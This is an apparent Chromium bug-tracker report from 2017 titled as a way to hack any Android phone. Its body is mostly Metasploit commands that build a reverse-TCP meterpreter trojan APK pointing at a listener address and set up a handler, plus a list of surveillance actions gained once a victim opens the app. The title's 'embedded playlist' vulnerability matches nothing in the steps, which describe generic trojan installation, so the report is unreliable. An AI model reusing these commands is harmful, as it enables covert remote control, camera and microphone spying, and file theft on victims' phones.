Hack any android phone using embedded playlist
Reported by
akshayas...@gmail.com,
May 26 2017
|
|
Issue descriptionDevice name: Lenovo vibe P1. (works on all Android version) From "Settings > About Chrome" Application version:58.0.3029.83 Operating system:5.1.1 URLs (if applicable): Steps to reproduce: Boot up Kali Linux and open Linux terminal and do the following steps (1)First you have to create a backdoor “Trojan App” to exploit android you can do this by running the following command at the terminal: root@kali:~# sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.21 lport=4444 R > app.apk (2)Use the multi-handler exploit: msf > use exploit/multi/handler Set the reverse TCP android payload: msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp Set the local and remote hosts: msf exploit(handler) > set lhost 192.168.0.21 msf exploit(handler) > set rhost 192.168.0.17 Set the local port: msf exploit(handler) > set lport 4444 Now exploit (3) Have a session open make sure the user clicks on the app called MainActivity(playload which can be embedded on other apps) Expected result:we can do the following hack View running processes Printing the Working directory Search for a file Take photos using the devices cameras Record sound with the microphone Video stream from the devices camera Download and upload files Change working directory Etc Actual result: View running processes Printing the Working directory Search for a file Take photos using the devices cameras Record sound with the microphone Video stream from the devices camera Download and upload files Change working directory |
|
►
Sign in to add a comment |
|
Comment 1 by torne@chromium.org
, May 26 2017